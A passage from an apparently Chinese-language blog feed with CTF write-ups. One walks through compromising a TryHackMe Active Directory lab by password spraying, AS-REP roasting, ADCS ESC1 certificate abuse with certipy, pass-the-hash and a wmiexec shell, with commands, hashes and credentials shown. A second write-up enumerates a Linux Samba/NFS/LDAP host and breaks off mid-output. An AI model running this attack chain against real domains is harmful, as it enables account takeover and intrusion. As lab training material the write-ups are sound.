# base &lt;&gt; (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=thm,DC=local
ldapServiceName: thm.local:labyrinth$@THM.LOCAL
...
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=thm,DC=local
serverName: CN=LABYRINTH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Con
 figuration,DC=thm,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=thm,DC=local
namingContexts: DC=thm,DC=local
namingContexts: CN=Configuration,DC=thm,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=thm,DC=local
namingContexts: DC=DomainDnsZones,DC=thm,DC=local
namingContexts: DC=ForestDnsZones,DC=thm,DC=local
isSynchronized: TRUE
highestCommittedUSN: 163924
dsServiceName: CN=NTDS Settings,CN=LABYRINTH,CN=Servers,CN=Default-First-Site-
 Name,CN=Sites,CN=Configuration,DC=thm,DC=local
dnsHostName: labyrinth.thm.local
defaultNamingContext: DC=thm,DC=local
currentTime: 20260908112616.0Z
configurationNamingContext: CN=Configuration,DC=thm,DC=local
</code></pre>
<p>枚举一下用户信息, 它是真多啊 .. 直接看 description 了</p>
<pre><code>ldapsearch -x -H ldap://10.66.139.100 -b 'DC=thm,DC=local' "(objectClass=user)" &gt; ldap
# wc -l ./ldap -&gt; 17879 ./ldap
cat ldap |grep desc|grep -v 'description: Tier 1 User'
description: Please change it: CHANGEME2023!
description: Please change it: CHANGEME2023!
</code></pre>
<p>其指出有一个密码候选项: <code>CHANGEME2023!</code></p>
<h3>pass spray</h3>
<p>有很多用户, 尝试一下密码喷洒:</p>
<pre><code>nxc smb thm.local  -u ./users -p 'CHANGEME2023!' --continue-on-success|tee -a ./nxc
cat nxc |grep +
SMB                      10.66.139.100   445    LABYRINTH        [+] thm.local\Domain:CHANGEME2023! (Guest)
SMB                      10.66.139.100   445    LABYRINTH        [+] thm.local\Protected:CHANGEME2023! (Guest)
SMB                      10.66.139.100   445    LABYRINTH        [+] thm.local\IVY_WILLIS:CHANGEME2023! 
SMB                      10.66.139.100   445    LABYRINTH        [+] thm.local\SUSANNA_MCKNIGHT:CHANGEME2023!
</code></pre>
<p>除去降级为 guest 的, 共两个用户: IVY_WILLIS, SUSANNA_MCKNIGHT</p>
<h1>Web</h1>
<p><img src="./web-page.png" alt="web page" />
80 和 443 都是默认页面, 不过 443 上的自签名 SSL 证书给出了一些线索:</p>
<pre><code>443/tcp   open   ssl/http      syn-ack ttl 128 Microsoft IIS httpd 10.0
|_ssl-date: 2026-09-08T11:09:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
</code></pre>
<p>:::note
即当前域环境存在 ADCS
:::</p>
<h1>roasting</h1>
<p>在有凭据后进行两种 roasting 会快很多, 可以直接查 ldap</p>
<h2>asreproasting</h2>
<pre><code>nxc ldap thm.local  -u 'IVY_WILLIS' -p 'CHANGEME2023!' --asreproast out.asrep
LDAP        10.66.139.100   389    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 (name:LABYRINTH) (domain:thm.local) (signing:None) (channel binding:Never) 
LDAP        10.66.139.100   389    LABYRINTH        [+] thm.local\IVY_WILLIS:CHANGEME2023! 
LDAP        10.66.139.100   389    LABYRINTH        [*] Total of records returned 5
LDAP        10.66.139.100   389    LABYRINTH        $krb5asrep$23$SHELLEY_BEARD@THM.LOCAL:de3f914abbaf8697da492b3f37c63d86$09c7c2e8229e0b41fc0dfe76062cbaa3b5dbe6694fbf3c685825ebfb76d1b1e5b4bc0a1cb39c045b2d55e93dc180878cd7b506970640f8d4793537e464238008e25112c3b74b87fb17913c27cc950d84cd9c2c7374aea25431cc8e4e103cb6c90ee61e76d32ea00470bc5113f7fdb3af82be464e6b1ae8ef5d9b11ce6950ac54dfceae979c5eb31bbe2819eede8a645f732694e008ff8822b9feaac71534c6277b1cf49f48a28114bab5c60b74cb63516a04ddf7e25f65ff97bc272659e644664888ece8512cd9cd84fa9b14c88fa952939efab3be73ec5904e9bb95e652b95870aa71cf34c9
LDAP        10.66.139.100   389    LABYRINTH        $krb5asrep$23$ISIAH_WALKER@THM.LOCAL:5d13e7649c3f144f68008a7775cd5f75$5f3b1189170b6da8b1e7c7d0f7f44f6af94ef0de4ba7c1ad3fc4f292a323117da8f14e5f87017d752e4e39677d460c24ac0456345295c2b0c54d84cf93c3717e401b6e06146ad2eaca7d03d7356b9c1ad28f7ee2a1c82e81f3e10258378d2f3e3275ff3fa27602933e3ee929ee2a5a081553b2fa48cefccb6af6c4599dc348ea4e2cecc1df5417dab3c1cf9979a1374f89bc0dc78101a3c3a355d637220c56a7bd98426d5bda1e676d85bf3701ae85b0834f896332022594a6f201953c1ddea499fff33e67054468e584bf097d0a15a9f80336e9cb7a3560ef249d8785536c3367253c789319
LDAP        10.66.139.100   389    LABYRINTH        $krb5asrep$23$QUEEN_GARNER@THM.LOCAL:722cd091a04b38c31b11ae6053c6847d$edd0e4c7800adfd3ff91774af7f908b6cf5900b229cfa6e34350c72c9b1acb0b0d3e885f5817de2e7cc2cb35e2764e95449b954217bef7071e0c91baef0fda36259d183c8c5a5a67d6d54f62a69440c1685021d417673522861d3ef323fc8986ac6ad8f873254b3f8a764c3ee336b1af52a14b36309d1fe68347b1262e84bf1378258eab251703af17885d8e763a5a223fa567459553f4acaf3e2ad75f5ddc5e1ad671ca5b91ca9209d3f5d2a25c66cda72b8cabdd354ed740c5ce2de13f184f50f20b74c53c20a4ce73a324720c6f81366def5010aae49df2a6ebe29eae73cc78bccf1d4971
LDAP        10.66.139.100   389    LABYRINTH        $krb5asrep$23$PHYLLIS_MCCOY@THM.LOCAL:2670e45cfe7f49fa85cf49c954c9d5d1$b93e6fe87a91a4e06c4e847270c734c65ae9729f1b097d7b68925220041d7d783f6e444b3a074b7b762ae7d68c44df3b3d0ae4610ac8d55751d52f6fe02e5cfe5f2ab0e67837dcd0fe9ae0c16b77f62822804b9669c254db88644ffeebba8e8c5a89e27ab514dfb4410f283055728a33265b919af38368df07088d409ba2ad80249b43470caf23ea8bf86e1da79a3166ca0f50a69f21d5c1308358fb756e034447d1243f6094e047e873e465fae7f97fc3ab52e3fb12d490d1e5447d41979318d6ea6a9e2e39c7683f988d5f319e213d9a6c959dce6cbd731c7dd757467ff467054255782505
LDAP        10.66.139.100   389    LABYRINTH        $krb5asrep$23$MAXINE_FREEMAN@THM.LOCAL:e96206582ff4ad6dbcad5db700ca0925$ee9b4581d9808fda21fd334f11d685f2d99d9f71447e9b2f24c74435845c1227076ebdfab8c6b580b4a526eb6e15c885ab67559fa927cef7ae93298eb12613f8913975884b24985eb70a6bce8a0d7d0d926db8f906d08f719022f56c8490430480abe06e1615ece988e75eb7402320a76086b187fcd8718912a172f31663fd070f386f653d9d1e2ad8d1e5d985f11409771572cbc6e77abea068b334af8e9c0a3d0d81a007197f55967435d55026a4b0b5391a59230fe91c75612741a679a9431a7448c032670c8479001456076a8acedb583522663881a567a45bee1b3e16633a813fc7b160
</code></pre>
<p>没有 hash 可以破解</p>
<h2>kerberoastng</h2>
<pre><code>nxc ldap thm.local  -u 'IVY_WILLIS' -p 'CHANGEME2023!' --kerberoasting kb
LDAP        10.66.139.100   389    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 (name:LABYRINTH) (domain:thm.local) (signing:None) (channel binding:Never) 
LDAP        10.66.139.100   389    LABYRINTH        [+] thm.local\IVY_WILLIS:CHANGEME2023! 
LDAP        10.66.139.100   389    LABYRINTH        [*] Skipping disabled account: krbtgt
LDAP        10.66.139.100   389    LABYRINTH        [*] Total of records returned 0
</code></pre>
<p>没有可以 kerberoasting 的服务账户</p>
<h1>act as IVY_WILLIS</h1>
<h2>perm analyse</h2>
<p>我是在 attackbox 上打的 THM 机器, 上面的 bloodhound 和采集器都有些问题, 用 bloodyad 替代\</p>
<pre><code>bloodyAD -d thm.local -u 'IVY_WILLIS' -p 'CHANGEME2023!' --dc-ip 10.66.160.191 --host thm.local  get  membership IVY_WILLIS

distinguishedName: CN=Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-545
sAMAccountName: Users

distinguishedName: CN=Remote Management Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-580
sAMAccountName: Remote Management Users

distinguishedName: CN=Domain Users,CN=Users,DC=thm,DC=local
objectSid: S-1-5-21-1966530601-3185510712-10604624-513
sAMAccountName: Domain Users
# --------
bloodyAD -d thm.local -u 'IVY_WILLIS' -p 'CHANGEME2023!' --dc-ip 10.66.160.191 --host thm.local  get membership SUSANNA_MCKNIGHT

distinguishedName: CN=Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-545
sAMAccountName: Users

distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-555
sAMAccountName: Remote Desktop Users

distinguishedName: CN=Remote Management Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-580
sAMAccountName: Remote Management Users

distinguishedName: CN=Domain Users,CN=Users,DC=thm,DC=local
objectSid: S-1-5-21-1966530601-3185510712-10604624-513
sAMAccountName: Domain Users
</code></pre>
<p>IVY_WILLIS 和 SUSANNA_MCKNIGHT 都属于 <code>Remote Management Users</code> 组, 但仅有 SUSANNA_MCKNIGHT 属于 <code>Remote Desktop Users</code> 组</p>
<h1>RDP as SUSANNA_MCKNIGHT</h1>
<pre><code>xfreerdp /v:10.66.160.191 /u:SUSANNA_MCKNIGHT /p:CHANGEME2023!
</code></pre>
<p><img src="./priv.png" alt="whoami" /></p>
<p>有趣的是 SUSANNA_MCKNIGHT 拥有 <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#certificate-service-dcom-access">certificate service dcom access group</a> 权限, 即可以连接企业CA</p>
<h1>ADCS</h1>
<pre><code>certipy find -dc-ip 10.66.151.14 -u SUSANNA_MCKNIGHT -p 'CHANGEME2023!' -json -enabled -vulnerable
</code></pre>
<p>这会返回所有的启用的并且有可利用漏洞的证书模版, 如果没有结果再设置全部返回</p>
<pre><code>{
  "Certificate Authorities": {
    "0": {
      "CA Name": "thm-LABYRINTH-CA",
      "DNS Name": "labyrinth.thm.local",
      "Certificate Subject": "CN=thm-LABYRINTH-CA, DC=thm, DC=local",
      "Certificate Serial Number": "5225C02DD750EDB340E984BC75F09029",
      "Certificate Validity Start": "2023-05-12 07:26:00+00:00",
      "Certificate Validity End": "2028-05-12 07:35:59+00:00",
      "Web Enrollment": {
        "http": {
          "enabled": false
        },
        "https": {
          "enabled": false,
          "channel_binding": null
        }
      },
      "User Specified SAN": "Disabled",
      "Request Disposition": "Issue",
      "Enforce Encryption for Requests": "Enabled",
      "Active Policy": "CertificateAuthority_MicrosoftDefault.Policy",
      "Permissions": {
        "Owner": "THM.LOCAL\\Administrators",
        "Access Rights": {
          "1": [
            "THM.LOCAL\\Administrators",
            "THM.LOCAL\\Domain Admins",
            "THM.LOCAL\\Enterprise Admins"
          ],
          "2": [
            "THM.LOCAL\\Administrators",
            "THM.LOCAL\\Domain Admins",
            "THM.LOCAL\\Enterprise Admins"
          ],
          "512": [
            "THM.LOCAL\\Authenticated Users"
          ]
        }
      }
    }
  },
  "Certificate Templates": {
    "0": {
      "Template Name": "ServerAuth",
      "Display Name": "ServerAuth",
      "Certificate Authorities": [
        "thm-LABYRINTH-CA"
      ],
      "Enabled": true,
      "Client Authentication": true,
      "Enrollment Agent": false,
      "Any Purpose": false,
      "Enrollee Supplies Subject": true,
      "Certificate Name Flag": [
        1
      ],
      "Extended Key Usage": [
        "Client Authentication",
        "Server Authentication"
      ],
      "Requires Manager Approval": false,
      "Requires Key Archival": false,
      "Authorized Signatures Required": 0,
      "Schema Version": 2,
      "Validity Period": "1 year",
      "Renewal Period": "6 weeks",
      "Minimum RSA Key Length": 2048,
      "Template Created": "2023-05-12 08:55:40+00:00",
      "Template Last Modified": "2023-05-12 08:55:40+00:00",
      "Permissions": {
        "Enrollment Permissions": {
          "Enrollment Rights": [
            "THM.LOCAL\\Domain Admins",
            "THM.LOCAL\\Domain Computers",
            "THM.LOCAL\\Enterprise Admins",
            "THM.LOCAL\\Authenticated Users"
          ]
        },
        "Object Control Permissions": {
          "Owner": "THM.LOCAL\\Administrator",
          "Full Control Principals": [
            "THM.LOCAL\\Domain Admins",
            "THM.LOCAL\\Enterprise Admins"
          ],
          "Write Owner Principals": [
            "THM.LOCAL\\Domain Admins",
            "THM.LOCAL\\Enterprise Admins"
          ],
          "Write Dacl Principals": [
            "THM.LOCAL\\Domain Admins",
            "THM.LOCAL\\Enterprise Admins"
          ],
          "Write Property Enroll": [
            "THM.LOCAL\\Domain Admins",
            "THM.LOCAL\\Domain Computers",
            "THM.LOCAL\\Enterprise Admins"
          ]
        }
      },
      "[+] User Enrollable Principals": [
        "THM.LOCAL\\Domain Computers",
        "THM.LOCAL\\Authenticated Users"
      ],
      "[!] Vulnerabilities": {
        "ESC1": "Enrollee supplies subject and template allows client authentication.",
        "ESC17": "Enrollee supplies subject and template allows server authentication."
      },
      "[*] Remarks": {
        "ESC17": "Other prerequisites may be required for this to be exploitable. See the wiki for more details."
      }
    }
  }
</code></pre>
<p>一些关于 CA 的信息:</p>
<ol>
<li>name: <code>thm-LABYRINTH-CA</code></li>
</ol>
<p>对于 ServerAuth 模版:</p>
<ol>
<li><code>"Enrollee Supplies Subject": true,</code>: 启用 <code>Enrollee Supplies Subject</code>, 用户可以在 CSRs(证书申请请求) 中使用任何用户的 SAN 进行申请</li>
<li><code>"THM.LOCAL\\Authenticated Users"</code>: 容许已验证的用户申请</li>
</ol>
<h2>ESC1 on ServerAuth</h2>
<p>先申请证书, 再验证.  ADCS 验证使用 kerberos 协议, 注意时间同步</p>
<pre><code>certipy req -dc-ip 10.66.151.14 -u SUSANNA_MCKNIGHT -p 'CHANGEME2023!' -ca 'thm-LABYRINTH-CA'  -template 'ServerAuth' -upn 'administrator@thm.local'
Certipy v5.1.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 25
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@thm.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

certipy auth -pfx ./administrator.pfx -dc-ip 10.66.137.208
Certipy v5.1.0 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@thm.local'
[*] Using principal: 'administrator@thm.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@thm.local': aad3b435b51404eeaad3b435b51404ee:07d677a6cf40925beb80ad6428752322
</code></pre>
<h1>act as Administrator</h1>
<pre><code>nxc smb thm.local -u administrator -H 07d677a6cf40925beb80ad6428752322 
SMB         10.66.137.208   445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.66.137.208   445    LABYRINTH        [-] thm.local\administrator:07d677a6cf40925beb80ad6428752322 STATUS_ACCOUNT_RESTRICTION 
</code></pre>
<p>认证成功, 但授权失败, 原因为 administrator 为 protected 用户, 无法使用 ntlm 进行登陆, 转向 kerberos.</p>
<pre><code>nxc smb thm.local -u administrator -H 07d677a6cf40925beb80ad6428752322  -k
SMB         thm.local       445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         thm.local       445    LABYRINTH        [+] thm.local\administrator:07d677a6cf40925beb80ad6428752322 (Pwn3d!)

wmiexec.py -k thm.local/administrator@labyrinth.thm.local -dc-ip 10.66.137.208
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\Users\Administrator\Desktop&gt;whoami
thm\administrator

C:\Users\Administrator\Desktop&gt;whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\Users\Administrator\Desktop&gt;ipconfig
Windows IP Configuration

Ethernet adapter Ethernet 3:
   Connection-specific DNS Suffix  . : ec2.internal
   Link-local IPv6 Address . . . . . : fe80::f8d:8605:a8e5:9e96%4
   IPv4 Address. . . . . . . . . . . : 10.66.137.208
   Subnet Mask . . . . . . . . . . . : 255.255.192.0
   Default Gateway . . . . . . . . . : 10.66.128.1
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="THM-writeup"/>
  </entry>
  <entry>
    <title>walnut-hs</title>
    <link href="https://0x5t4ckc47.github.io/posts/walnut-hs/walnut/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/walnut-hs/walnut/</id>
    <published>2026-09-05T00:00:00.000Z</published>
    <updated>2026-09-05T00:00:00.000Z</updated>
    <summary>终将好看, 素晴好看</summary>
    <content type="html"><![CDATA[<h1>recon</h1>
<p>为模拟 ‘Assumed Breach’ 场景, 提供了以下凭据:</p>
<pre><code>username: larryburns
password: IloveMontgommery!
Host: walnut.local
</code></pre>
<p>端口扫描:</p>
<pre><code>PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 62 OpenSSH 9.6p1 Ubuntu 3ubuntu13.18 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a1:50:1d:04:de:66:51:74:29:2d:8e:87:af:5d:7d:17 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDAe2OGwLE70VoJDOkmnOr88x5SbEbR7mN7xhBqklK0Eyhcd9Edl4BwWaZmZ04fp2XG5bcRYfVYvD6LCxNDXSQk=
|   256 4a:db:47:8c:fa:61:66:2e:22:e5:df:da:bb:b3:ce:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIrrcUB1RZkqREz6oXnJ6JoTHvvkQfCehxAricf5Lelq
111/tcp  open  rpcbind     syn-ack ttl 62 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      41849/tcp   mountd
|   100005  1,2,3      42606/udp   mountd
|   100005  1,2,3      43796/udp6  mountd
|   100005  1,2,3      52439/tcp6  mountd
|   100021  1,3,4      37103/tcp   nlockmgr
|   100021  1,3,4      43857/tcp6  nlockmgr
|   100021  1,3,4      56933/udp   nlockmgr
|   100021  1,3,4      60116/udp6  nlockmgr
|   100024  1          35249/tcp6  status
|   100024  1          51634/udp6  status
|   100024  1          51996/udp   status
|   100024  1          60383/tcp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
139/tcp  open  netbios-ssn syn-ack ttl 62 Samba smbd 4
389/tcp  open  ldap        syn-ack ttl 62 OpenLDAP 2.2.X - 2.3.X
445/tcp  open  netbios-ssn syn-ack ttl 62 Samba smbd 4
2049/tcp open  nfs_acl     syn-ack ttl 62 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 63092/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 57550/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45643/udp): CLEAN (Failed to receive data)
|   Check 4 (port 49235/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: WALNUT, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)
| Names:
|   WALNUT&lt;00&gt;           Flags: &lt;unique&gt;&lt;active&gt;
|   WALNUT&lt;03&gt;           Flags: &lt;unique&gt;&lt;active&gt;
|   WALNUT&lt;20&gt;           Flags: &lt;unique&gt;&lt;active&gt;
|   \x01\x02__MSBROWSE__\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;
|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;
|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;
|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-time: 
|   date: 2026-09-05T11:25:49
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep  5 07:26:08 2026 -- 1 IP address (1 host up) scanned in 33.17 seconds
</code></pre>
<p>一台无 web 的 Linux 机器, 一些分析:</p>
<ol>
<li>异常的全端口 ttl:62</li>
<li><code>111,139,389,445</code>: Samba 以及 Openldap</li>
<li><code>2049</code>: NFS</li>
</ol>
<h2>NFS</h2>
<p>首先从 NFS 入手:</p>
<pre><code>┌──(stackcat㉿r1ngz0ps)-[~/Documents/hs]
└─$ showmount -e 10.1.165.102
Export list for 10.1.165.102:
</code></pre>
<p>但默认情况下没有共享</p>
<h2>Samba</h2>
<p>应用凭据:</p>
<pre><code>nxc smb 10.1.165.102 -u 'larryburns' -p 'IloveMontgommery!' --shares
SMB         10.1.165.102    445    WALNUT           [*] Unix - Samba (name:WALNUT) (domain:local) (signing:False) (SMBv1:None) (Null Auth:True)
SMB         10.1.165.102    445    WALNUT           [+] local\larryburns:IloveMontgommery! (Guest)
SMB         10.1.165.102    445    WALNUT           [*] Enumerated shares
SMB         10.1.165.102    445    WALNUT           Share           Permissions     Remark
SMB         10.1.165.102    445    WALNUT           -----           -----------     ------
SMB         10.1.165.102    445    WALNUT           print$                          Printer Drivers
SMB         10.1.165.102    445    WALNUT           automation                      automation share
SMB         10.1.165.102    445    WALNUT           IPC$                            IPC Service (walnut server (Samba, Ubuntu))
</code></pre>
<p>访问被降级为 <code>Guest</code>, 有一个非默认共享: <code>automation</code>, 但当前尚无操作权限</p>
<p>enum4linux:</p>
<pre><code>enum4linux-ng -A -u larryburns -p IloveMontgommery! walnut.local
ENUM4LINUX - next generation (v1.3.10)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... walnut.local
[*] Username ......... 'larryburns'
[*] Random Username .. 'mkztwqrr'
[*] Password ......... 'IloveMontgommery!'
[*] Timeout .......... 10 second(s)

 =====================================
|    Listener Scan on walnut.local    |
 =====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 ====================================================
|    Domain Information via LDAP for walnut.local    |
 ====================================================
[*] Trying LDAP
[-] LDAP connect error: automatic bind not successful - inappropriateAuthentication

 ===========================================================
|    NetBIOS Names and Workgroup/Domain for walnut.local    |
 ===========================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Full NetBIOS names information:
- WALNUT          &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service
- WALNUT          &lt;03&gt; -         B &lt;ACTIVE&gt;  Messenger Service
- WALNUT          &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service
- ..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Master Browser
- WORKGROUP       &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain/Workgroup Name
- WORKGROUP       &lt;1d&gt; -         B &lt;ACTIVE&gt;  Master Browser
- WORKGROUP       &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Browser Service Elections
- MAC Address = 00-00-00-00-00-00

 =========================================
|    SMB Dialect Check on walnut.local    |
 =========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.0.2: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false

 ===========================================================
|    Domain Information via SMB session for walnut.local    |
 ===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: WALNUT
NetBIOS domain name: ''
DNS domain: local
FQDN: walnut.local
Derived membership: workgroup member
Derived domain: unknown

 =========================================
|    RPC Session Check on walnut.local    |
 =========================================
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
[*] Check for password authentication
[+] Server allows authentication via username 'larryburns' and password 'IloveMontgommery!'
[*] Check for guest access
[+] Server allows authentication via username 'mkztwqrr' and password 'IloveMontgommery!'
[H] Rerunning enumeration with user 'mkztwqrr' might give more results

 ===================================================
|    Domain Information via RPC for walnut.local    |
 ===================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member

 ===============================================
|    OS Information via RPC for walnut.local    |
 ===============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT walnut server (Samba, Ubuntu)

 =====================================
|    Users via RPC on walnut.local    |
 =====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 1 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 1 user(s) via 'enumdomusers'
[+] After merging user results we have 1 user(s) total:
'1000':
  username: automation
  name: ''
  acb: '0x00000010'
  description: ''

 ======================================
|    Groups via RPC on walnut.local    |
 ======================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 ======================================
|    Shares via RPC on walnut.local    |
 ======================================
[*] Enumerating shares
[+] Found 3 share(s):
IPC$:
  comment: IPC Service (walnut server (Samba, Ubuntu))
  type: IPC
automation:
  comment: automation share
  type: Disk
print$:
  comment: Printer Drivers
  type: Disk
[*] Testing share IPC$
[+] Mapping: OK, Listing: N
</code></pre>
<p>噪音很多, 但给出了有效的用户信息: <code>automation</code></p>
<h2>OpenLdap</h2>
<p>openldap 的 <a href="https://www.openldap.org/doc/admin26/intro.html">DCtree 结构</a>与微软的 ldap 有所不同:
<img src="./openldap_dctree.png" alt="dctree" /></p>
<pre><code>ldapsearch  -x -H ldap://10.1.165.102 -D 'uid=larryburns,ou=people,dc=walnut,dc=local' -w 'IloveMontgommery!' -b "DC=walnut,DC=local"
# extended LDIF
#
# LDAPv3
# base &lt;DC=walnut,DC=local&gt; with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# walnut.local
dn: dc=walnut,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: Kurumi inc
dc: walnut

# Groups, walnut.local
dn: ou=Groups,dc=walnut,dc=local
objectClass: organizationalUnit
ou: Groups

# People, walnut.local
dn: ou=People,dc=walnut,dc=local
objectClass: organizationalUnit
ou: People

# automation, Groups, walnut.local
